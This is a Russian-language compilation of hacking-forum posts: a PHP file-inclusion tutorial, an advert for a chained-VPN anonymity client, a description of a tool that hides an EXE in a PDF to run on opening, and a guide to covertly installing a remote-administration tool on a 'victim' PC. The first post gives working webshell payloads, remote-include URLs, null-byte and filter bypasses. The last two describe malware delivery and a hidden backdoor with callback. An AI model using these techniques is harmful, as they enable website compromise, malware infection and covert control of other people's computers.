Разные статьи.

[Rogge]

Очень часто можно приинклудить свою сессию.
Смысл:
пхп скрипт работает с сессиями и пишет например в них рефер или юзерагент.
ОБратимся к сайту с юзерагентом и рефером вида "<?php system($_GET['a']) ?>".
Допустим пхп скрипт записал это в нашу сессию.
Сессиии храняться в катологе temp и имеют префикс sess_
Узнаем имя своей сесии из куков.
обращаемся к скрипту так:
Код:
http://..............index.php?file=../temp/sess_ИМЯ_НАШЕЙ_СЕСИИ
http://..............index.php?file=../temp/sess_54c8da464dd4d65a4c80a1b2c4a598c81&a=ls
Сессия это просто текстовый файл, в который пишутся данные.
Пхп скрипт, найдя дескрипторы <?php и ?> интерпретирует в них команды.








Можно каким-либо образом загрузить файл на сайт, а потом его приинклудить и он выполниться. Например сайт какой-то фотогаллерии. Загружаем картинку (аву или ченить наподобие), предварительно подправив сорец картинки (вписав <?php system($_GET['cmd']) ?>). Картинку загрузили, посмотрели её адрес и пробуем инклудить...
Код:
http://....../index.php?file=images/IMG_012454.jpg?cmd=ls
и видим список файлов и папок в текущей директории.


2. Можно приинклудить файлы которые находятся на других сайтах.
Условие:
Код:
; PHP.INI
allow_url_fopen = ON
allow_url_include = ON
Создаем сайт на каком-нибудь бесплатном хостинге, например narod.ru.
Загружаем текстовый файл с текстом <?php system($_GET['cmd']); ?> а можно и записать в текстовик полноценный код шелла (r57,c99 итд).
Загрузили с именем a.txt предположим.
Идем на бажный сайтец с такими параметрами
Код:
http://......./index.php?file=http://nashsajt.narod.ru/a.txt&cmd=ls
Еcли же у нас
Код:
include("$_GET['razdel']/default/index.php");
то на своем хостинге создаем папку /default/index.php . Но нам надо чтобы пхп не интерпретировался на нашем хостинге, тоесть при обращении к index.php был
Код:
http://.............index.php?razdel=http://nashsajt.narod.ru
Получиться
Код:
include("http://nashsajt.narod.ru/default/index.php");


Бывает например вот так
Код:
Include("images/$_GET['file'].jpg");
Тоесть нам мешается расширение jpg. Отсечь его можно вот так:
Код:
htp://........index.php?file=../../etc/passwd%00

Что такое %00 ?
Нуллбайт - пустой символ. Т.к. пхп написан на с++, а в с++ нуллбайт означает конец текстовой строки, поэтому в строчке lalala%00fffff пхп увидит только lalala

Сейчас редко где прокатывает нуллбайт. Но есть альтернатива:

Для WIN универсальный символ для последовательности в векторе атаки это точка (.);
минимальная универсальная длина этой последовательности - 266 символов

в *nix единственным и универсальным символом является слэш (/);
минимальная универсальная длина последовательности - 4095 символов;
Код:
http://...../test.php?lol=inc.php.......................
Код:
http://localhost/test.php?lol=inc.php/////////////////////
Более детальная информация об альтернативе нулл байта - Форум АНТИЧАТ - [новый способ] замена нулл-байту в инклудах



Иногда в скрипах делают фильтры , которые режут ../
Код:
<?php
str_replace('../','',$_GET['inc']);
?>
Обходится элементарно:

Код:
http://...../?inc=....//....//a.php

 

[Rogge]

Double VPN своими руками

На сегоднешний день каждый,те кто не первый день в бизе, каждый заботится о своей анонимности. И как не странно, на сегоднешний день нет доверия к различным VPN провайдерам, подозрение о том что они видут логи заставляют вас менять свои VPN сервера, найден выход. VipVPN GUI Client поможет вам соеденить несколько Single VPN серверов что обеспечит вам более надежную анонимность в сети. Вам потребуется поставить конфиги и ключи от одного VPN в "program files/vipvpn/config" и от другого VPN в "program files/vipvpn/config/double"
И один впн заработает через второй !
Так же клиент поддерживает Double VPN сщеденение.
И в режиме реального времени вы сможете просматривать ваш IP адресс.

Описание клиента:
VipVPN GUI Client
VipVPN GUI Client это замечательный клиент для подключения через ваш VPN сервер.
Имеется возможность создание цепочек из Single VPN серверов.
Проверка вашего IP теперь возможна через клиент!
При помощи VipVPN GUI Client вы обеспечите себе более надежную анонимность!



Функции:
-AutoRoute Checker. Fixes Important Routing Bugs. Other VPN Clients can show that you are connected, but your connection is totally unsecured.
-Exclude List for Other VPN's or Double VPN Systems
-AutoRun
-AutoConnect / Expiration Date Reminder



Программа полностью бесплатана.


Скачать с сайта разработчика VipVPN GUI Client


Сайт разработчика vipvpn.com

 

[Rogge]

Склеиваем PDF c EXE (by d_x & Kaimi)

В начале года несколькими людьми была найдена "уязвимость" в формате PDF, позволяющая запускать произвольный код при открытии файла, которая на самом деле является документированной возможностью формата. Всего было опубликовано два типа уязвимостей: с использованием и без использования JavaScript.
После беглого изучения формата и специфики этой проблемы была реализована программа для внедрения exe файлов в тело pdf и последующего запуска exe при открытии. Конечно, при открытии pdf выдается предупреждение:

Однако, существует возможность вывести произвольный текст в окне предупреждения (актуально для Acrobat Reader 9.*, в 8.* весь внедренный код вываливается целиком, и пользователь, скорее всего, что-нибудь заподозрит).

Программа обладает следующими возможностями:

*Задание произвольного текста сообщение (лучше не делать текст длинным)
*Задание имени временного vbs файла (используется для создания exe файла из тела pdf)
*Задание имени временного exe
*Возможность удаления exe через заданный интервал времени

Интерфейс программы предельно прост и выглядит следующим образом:

Download



===== Как это работает? =====


Программа открывает заданный PDF-документ и ищет в нем максимальное значение номера объекта. После этого создается собственный объект с командой запуска, и его выполнение указывается в корневом объекте PDF, т.е запуск происходит сразу после открытия документа.

Было много проблем плана "а как же спрятать exe?". Алгоритм таков: если пользователь разрешает запуск объекта, открывается cmd.exe, создающая небольшой vbscript-сценарий.

Этот сценарий запускается и начинает искать в текущей директории pdf-документ с самой последней датой изменения (очевидно, это будет наш коварный pdf). Сценарий открывает этот файл и считывает из него заданный диапазон байтов (это второй vbs-файл, спрятанный в конец pdf-документа) и записывает его в виде нового vbscript-сценария, после чего запускает. На этом работа первого сценария завершена.

Второй сценарий содержит тело exe-файла, запакованное в массив байтов. Сценарий из массива создает exe-файл и запускает его, после чего удаляет себя и первый сценарий. Если была задана опция удаления exe, то сценарий ждет заданное время и пытается удалить также созданный exe-файл.

Окно командной строки при всех этих манипуляциях появляется всего на пару секунд.

Такой подход позволяет спрятать в pdf-документе exe-файл любого размера и за несколько секунд запустить его.

 

[Rogge]

Remote Office Manager - конкурент RAdmin'a

Предисловие:
Недавно мне понадобилось найти прогу для незаметного проникновения на чужой комп и ... много чего дальше..) Как раз нашел Radmin'a. На первый взгляд - то, что надо! Но вот облом, если радмин за NAT-ом, то к нему не приконектишься(. + В каждый раз необходимо пробивать IP жертвы. Это стало проблемой, над которой мне не захотелось долго сидеть. Проведя несколько минут в поисках аналога Радмина я нашел ROM. Использую версию 4.0.1.
Набор встроенных утилит (Viever) :

* Просмотр.
* Управление.
* Удаленный диспетчер задач.
* Файловый менеджер.
* Управление питанием.
* Перехват оверлейного видео.
* Перехват звука.
* Удаленный запуск программ.
* Терминал.
* Диспетчер устройств.
* Текстовое сообщение.
* Чат.
* Запись экрана.

Настройки (Server) :

* Автозапуск Вкл/Выкл.
* Отображение иконки в трее.
* Пароль и др...
* "Обратное соединение" (callback)

Офф. сайт -> Общее описание
Скачать клиент+сервер можно здесь

Установка:
Итак, как говорится в великом help'e, для установки вручную нам потребуются файлы:

* AledensoftIpcServer.dll
* HookDrv.dll
* ROMFUSClient.exe
* ROMServer.exe
* ROMwln.dll

Общий размер файлов - 4,1 МБ

Эти файлы кидаем в любую папку. Не имеет значения, в какой папке будет установлен ROM.

Дальше надо создать создать *.reg файл в котором будут все необходимые настройки сервера.
Для этого устанавливаем ROMServer инсталлятором, делаем все необходимые установки. Главное не забыть про автозапуск, отображение в трее, Обратное соединение ну и пароль)

Если у Вас динамичесский IP, то зарегистрируйте себе на DynDns.com бесплатный домен и скачайте клиент для обновления IP, привязанного к Вашему домену.
В настройках Обратного cоединения ROMServer'a надо ввести Ваш IP или зарегистрированный Вами домен на DynDns.
Когда закончили с настройками сервера, Запустите стандартный редактор реестра Windows (c:\windows\regedit.exe). Экспортируйте раздел реестра
KEY_LOCAL_MACHINE\SYSTEM\Remote Office Manager\v3.4\Server\Parameters в файл, например, settings.reg.
Для того, чтобы принимать входящие соединения в настройках ROM-Viewer необходимо включить соответствующую опцию. Откройте окно настроек ROM-Viewer ("Инструменты -> Настройки"). В появившемся окне перейдите во вкладку "Обратное соединение". Установите флажок "Разрешить входящие соединения".

Впринципе всё. Вот я склепал скриптик для установки сервера. Изменяйте его, как Вам хочется. Он в архиве с видео.

В итоге:
Однажды установив сервер на компе жертвы, ROMServer просится подключиться к Вашему Viewer'u при каждой перезагрузке компьютера ( Вашего/Жертвы )

Примечания:


Параметры запуска ROMServer.exe

* /silentinstall — установить службу.
* /silentuninstall — деинсталлировать службу.
* /firewall — интегрировать с системным файрволлом Windows XP/Vista.
* /start — запустить сервер.
* /stop — остановить сервер.
* /config — открыть окно настроек.


Внимательно читайте Help!

И ещё) не забудьте открыть у себя нужные порты (по умолчанию 5650 и 5651) , если они за NAT-ом.